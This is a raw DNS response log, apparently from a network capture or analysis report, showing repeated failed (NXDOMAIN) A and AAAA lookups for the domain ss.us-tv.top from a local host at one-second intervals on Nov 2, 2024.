Nov 2, 2024 04:05:32.319597006 CET	1.1.1.1	192.168.2.15	0x10d4	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:33.337703943 CET	1.1.1.1	192.168.2.15	0xbbda	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:33.340864897 CET	1.1.1.1	192.168.2.15	0xaf16	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:33.344348907 CET	1.1.1.1	192.168.2.15	0xbbda	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:33.347937107 CET	1.1.1.1	192.168.2.15	0xaf16	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:34.362881899 CET	1.1.1.1	192.168.2.15	0xe465	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:34.362904072 CET	1.1.1.1	192.168.2.15	0x6282	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:34.369590998 CET	1.1.1.1	192.168.2.15	0xe465	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:34.369620085 CET	1.1.1.1	192.168.2.15	0x6282	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:35.387787104 CET	1.1.1.1	192.168.2.15	0x103d	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:35.388045073 CET	1.1.1.1	192.168.2.15	0xe03a	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:35.394620895 CET	1.1.1.1	192.168.2.15	0xe03a	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:35.394629955 CET	1.1.1.1	192.168.2.15	0x103d	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:36.414518118 CET	1.1.1.1	192.168.2.15	0xc378	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:36.421354055 CET	1.1.1.1	192.168.2.15	0xc378	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:36.499017954 CET	1.1.1.1	192.168.2.15	0x3cdc	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:36.506139994 CET	1.1.1.1	192.168.2.15	0x3cdc	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:37.524936914 CET	1.1.1.1	192.168.2.15	0xdc0	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:37.525629997 CET	1.1.1.1	192.168.2.15	0x6501	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:37.531653881 CET	1.1.1.1	192.168.2.15	0xdc0	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:37.532196045 CET	1.1.1.1	192.168.2.15	0x6501	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:38.548073053 CET	1.1.1.1	192.168.2.15	0xe142	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:38.554807901 CET	1.1.1.1	192.168.2.15	0xe142	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:38.629172087 CET	1.1.1.1	192.168.2.15	0xa58e	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:38.762126923 CET	1.1.1.1	192.168.2.15	0xa58e	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:39.775517941 CET	1.1.1.1	192.168.2.15	0x3b9a	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:39.775893927 CET	1.1.1.1	192.168.2.15	0xf4d0	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:39.782399893 CET	1.1.1.1	192.168.2.15	0x3b9a	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:39.782414913 CET	1.1.1.1	192.168.2.15	0xf4d0	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:40.803800106 CET	1.1.1.1	192.168.2.15	0x837b	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:40.803814888 CET	1.1.1.1	192.168.2.15	0x22f3	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:40.810394049 CET	1.1.1.1	192.168.2.15	0x837b	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:40.936770916 CET	1.1.1.1	192.168.2.15	0x22f3	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:41.953905106 CET	1.1.1.1	192.168.2.15	0x5bac	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:41.954705000 CET	1.1.1.1	192.168.2.15	0xd6aa	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:41.960481882 CET	1.1.1.1	192.168.2.15	0x5bac	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:41.961267948 CET	1.1.1.1	192.168.2.15	0xd6aa	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:42.976316929 CET	1.1.1.1	192.168.2.15	0x2b02	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:42.977334023 CET	1.1.1.1	192.168.2.15	0x2f6a	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:42.983000040 CET	1.1.1.1	192.168.2.15	0x2b02	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:42.984291077 CET	1.1.1.1	192.168.2.15	0x2f6a	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:43.999120951 CET	1.1.1.1	192.168.2.15	0xfd82	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:43.999142885 CET	1.1.1.1	192.168.2.15	0x443b	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:44.005943060 CET	1.1.1.1	192.168.2.15	0x443b	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:44.006388903 CET	1.1.1.1	192.168.2.15	0xfd82	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:45.024204969 CET	1.1.1.1	192.168.2.15	0x5e8e	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:45.025753021 CET	1.1.1.1	192.168.2.15	0x3ec	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:45.030622959 CET	1.1.1.1	192.168.2.15	0x5e8e	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:45.033314943 CET	1.1.1.1	192.168.2.15	0x3ec	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:46.053095102 CET	1.1.1.1	192.168.2.15	0x443c	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:46.053272963 CET	1.1.1.1	192.168.2.15	0xc4fa	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:46.060421944 CET	1.1.1.1	192.168.2.15	0x443c	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:46.060628891 CET	1.1.1.1	192.168.2.15	0xc4fa	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:47.075858116 CET	1.1.1.1	192.168.2.15	0xab9d	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:47.076433897 CET	1.1.1.1	192.168.2.15	0x56ac	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:47.082580090 CET	1.1.1.1	192.168.2.15	0xab9d	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:47.083017111 CET	1.1.1.1	192.168.2.15	0x56ac	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:48.099148035 CET	1.1.1.1	192.168.2.15	0x5d11	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:48.099174023 CET	1.1.1.1	192.168.2.15	0x2bf9	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:48.105891943 CET	1.1.1.1	192.168.2.15	0x2bf9	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:48.105910063 CET	1.1.1.1	192.168.2.15	0x5d11	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:49.123269081 CET	1.1.1.1	192.168.2.15	0x876e	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:49.129884005 CET	1.1.1.1	192.168.2.15	0x876e	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:49.208369017 CET	1.1.1.1	192.168.2.15	0xfc0	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:49.215184927 CET	1.1.1.1	192.168.2.15	0xfc0	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:50.229926109 CET	1.1.1.1	192.168.2.15	0xc10	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:50.229954958 CET	1.1.1.1	192.168.2.15	0xb3fa	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:50.236531973 CET	1.1.1.1	192.168.2.15	0xc10	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:50.236661911 CET	1.1.1.1	192.168.2.15	0xb3fa	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:51.255100012 CET	1.1.1.1	192.168.2.15	0x3792	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:51.256249905 CET	1.1.1.1	192.168.2.15	0xe5f7	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:51.261596918 CET	1.1.1.1	192.168.2.15	0x3792	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:51.262866020 CET	1.1.1.1	192.168.2.15	0xe5f7	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:52.281449080 CET	1.1.1.1	192.168.2.15	0x3373	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:52.281461954 CET	1.1.1.1	192.168.2.15	0xb10	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:52.288326979 CET	1.1.1.1	192.168.2.15	0xb10	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:52.288336992 CET	1.1.1.1	192.168.2.15	0x3373	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:53.303680897 CET	1.1.1.1	192.168.2.15	0xde78	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:53.303742886 CET	1.1.1.1	192.168.2.15	0xe7ed	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:53.310291052 CET	1.1.1.1	192.168.2.15	0xde78	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:53.310365915 CET	1.1.1.1	192.168.2.15	0xe7ed	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:54.327406883 CET	1.1.1.1	192.168.2.15	0xab4a	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:54.327466965 CET	1.1.1.1	192.168.2.15	0x8ab9	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:54.334283113 CET	1.1.1.1	192.168.2.15	0x8ab9	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:54.943048000 CET	1.1.1.1	192.168.2.15	0xab4a	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:55.957711935 CET	1.1.1.1	192.168.2.15	0x4d93	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:55.957731962 CET	1.1.1.1	192.168.2.15	0xcd77	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:55.964757919 CET	1.1.1.1	192.168.2.15	0xcd77	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:56.311853886 CET	1.1.1.1	192.168.2.15	0x4d93	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:57.324690104 CET	1.1.1.1	192.168.2.15	0xab8a	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:57.325093985 CET	1.1.1.1	192.168.2.15	0x4376	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:57.331374884 CET	1.1.1.1	192.168.2.15	0xab8a	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:57.331625938 CET	1.1.1.1	192.168.2.15	0x4376	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:58.348162889 CET	1.1.1.1	192.168.2.15	0xe7b4	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:58.348298073 CET	1.1.1.1	192.168.2.15	0xa0eb	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:58.356018066 CET	1.1.1.1	192.168.2.15	0xe7b4	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:58.356609106 CET	1.1.1.1	192.168.2.15	0xa0eb	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:59.372908115 CET	1.1.1.1	192.168.2.15	0xb2b	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:59.373261929 CET	1.1.1.1	192.168.2.15	0x2acc	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:59.380939007 CET	1.1.1.1	192.168.2.15	0x2acc	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:59.383322954 CET	1.1.1.1	192.168.2.15	0xb2b	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:00.398037910 CET	1.1.1.1	192.168.2.15	0x2ac7	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:00.399616003 CET	1.1.1.1	192.168.2.15	0xfe6c	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:00.404845953 CET	1.1.1.1	192.168.2.15	0x2ac7	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:00.406454086 CET	1.1.1.1	192.168.2.15	0xfe6c	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:01.425916910 CET	1.1.1.1	192.168.2.15	0x472c	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:01.425929070 CET	1.1.1.1	192.168.2.15	0x636e	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:01.432674885 CET	1.1.1.1	192.168.2.15	0x472c	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:01.433058023 CET	1.1.1.1	192.168.2.15	0x636e	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:02.451569080 CET	1.1.1.1	192.168.2.15	0xd5d	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:02.458559990 CET	1.1.1.1	192.168.2.15	0xd5d	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:02.534948111 CET	1.1.1.1	192.168.2.15	0x68df	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:02.542768955 CET	1.1.1.1	192.168.2.15	0x68df	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:03.558862925 CET	1.1.1.1	192.168.2.15	0x6aab	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:03.559319973 CET	1.1.1.1	192.168.2.15	0xa9ba	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:03.565792084 CET	1.1.1.1	192.168.2.15	0x6aab	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:03.692178965 CET	1.1.1.1	192.168.2.15	0xa9ba	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:04.707024097 CET	1.1.1.1	192.168.2.15	0x3052	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:04.707468033 CET	1.1.1.1	192.168.2.15	0xdafa	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:04.713685989 CET	1.1.1.1	192.168.2.15	0x3052	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:04.714037895 CET	1.1.1.1	192.168.2.15	0xdafa	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:05.729087114 CET	1.1.1.1	192.168.2.15	0xf2fd	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:05.729106903 CET	1.1.1.1	192.168.2.15	0x4aee	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:05.735677958 CET	1.1.1.1	192.168.2.15	0xf2fd	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:05.735688925 CET	1.1.1.1	192.168.2.15	0x4aee	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:06.751507044 CET	1.1.1.1	192.168.2.15	0xe37a	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:06.752974033 CET	1.1.1.1	192.168.2.15	0x5aba	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:06.758332014 CET	1.1.1.1	192.168.2.15	0xe37a	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:06.759612083 CET	1.1.1.1	192.168.2.15	0x5aba	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:07.776772022 CET	1.1.1.1	192.168.2.15	0x4de0	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:07.776808023 CET	1.1.1.1	192.168.2.15	0x95c2	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:07.783643961 CET	1.1.1.1	192.168.2.15	0x95c2	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:07.783657074 CET	1.1.1.1	192.168.2.15	0x4de0	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:08.800131083 CET	1.1.1.1	192.168.2.15	0x69a0	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:08.800641060 CET	1.1.1.1	192.168.2.15	0x544	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:08.807013035 CET	1.1.1.1	192.168.2.15	0x69a0	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:08.807359934 CET	1.1.1.1	192.168.2.15	0x544	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:09.821743011 CET	1.1.1.1	192.168.2.15	0x6523	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:09.821793079 CET	1.1.1.1	192.168.2.15	0x33da	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:09.828581095 CET	1.1.1.1	192.168.2.15	0x6523	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:09.828593969 CET	1.1.1.1	192.168.2.15	0x33da	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:10.845587015 CET	1.1.1.1	192.168.2.15	0x6f30	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:10.845598936 CET	1.1.1.1	192.168.2.15	0x6c72	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:10.852581024 CET	1.1.1.1	192.168.2.15	0x6f30	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:10.852626085 CET	1.1.1.1	192.168.2.15	0x6c72	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:11.867333889 CET	1.1.1.1	192.168.2.15	0x2196	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:11.867790937 CET	1.1.1.1	192.168.2.15	0x99d6	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:11.874198914 CET	1.1.1.1	192.168.2.15	0x2196	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:11.874346018 CET	1.1.1.1	192.168.2.15	0x99d6	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:12.893176079 CET	1.1.1.1	192.168.2.15	0x5c2b	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:12.893599033 CET	1.1.1.1	192.168.2.15	0x6e4f	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:12.899772882 CET	1.1.1.1	192.168.2.15	0x5c2b	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:12.900126934 CET	1.1.1.1	192.168.2.15	0x6e4f	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:13.918836117 CET	1.1.1.1	192.168.2.15	0xe203	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:13.920979023 CET	1.1.1.1	192.168.2.15	0x87fd	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:13.925720930 CET	1.1.1.1	192.168.2.15	0xe203	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:13.927762032 CET	1.1.1.1	192.168.2.15	0x87fd	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:14.941890955 CET	1.1.1.1	192.168.2.15	0xd780	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:14.944945097 CET	1.1.1.1	192.168.2.15	0xa23b	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:14.948544025 CET	1.1.1.1	192.168.2.15	0xd780	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:14.951625109 CET	1.1.1.1	192.168.2.15	0xa23b	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:15.966326952 CET	1.1.1.1	192.168.2.15	0x88d0	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:15.966757059 CET	1.1.1.1	192.168.2.15	0x10e9	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:15.973284960 CET	1.1.1.1	192.168.2.15	0x10e9	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:16.624675989 CET	1.1.1.1	192.168.2.15	0x88d0	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:17.639766932 CET	1.1.1.1	192.168.2.15	0xa20e	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:17.640197992 CET	1.1.1.1	192.168.2.15	0xa0d1	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:17.646617889 CET	1.1.1.1	192.168.2.15	0xa20e	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:17.646756887 CET	1.1.1.1	192.168.2.15	0xa0d1	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:18.659885883 CET	1.1.1.1	192.168.2.15	0x8f0a	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:18.662081003 CET	1.1.1.1	192.168.2.15	0xc594	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:18.666635990 CET	1.1.1.1	192.168.2.15	0x8f0a	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:18.668694973 CET	1.1.1.1	192.168.2.15	0xc594	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:19.681169033 CET	1.1.1.1	192.168.2.15	0x98d7	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:19.681534052 CET	1.1.1.1	192.168.2.15	0x2f0	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:19.687804937 CET	1.1.1.1	192.168.2.15	0x98d7	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:19.688246012 CET	1.1.1.1	192.168.2.15	0x2f0	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:20.701877117 CET	1.1.1.1	192.168.2.15	0xef3b	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:20.701898098 CET	1.1.1.1	192.168.2.15	0x189c	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:20.708597898 CET	1.1.1.1	192.168.2.15	0xef3b	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:20.708622932 CET	1.1.1.1	192.168.2.15	0x189c	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:21.722002983 CET	1.1.1.1	192.168.2.15	0x530a	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:21.722414017 CET	1.1.1.1	192.168.2.15	0x626e	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:21.728692055 CET	1.1.1.1	192.168.2.15	0x530a	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
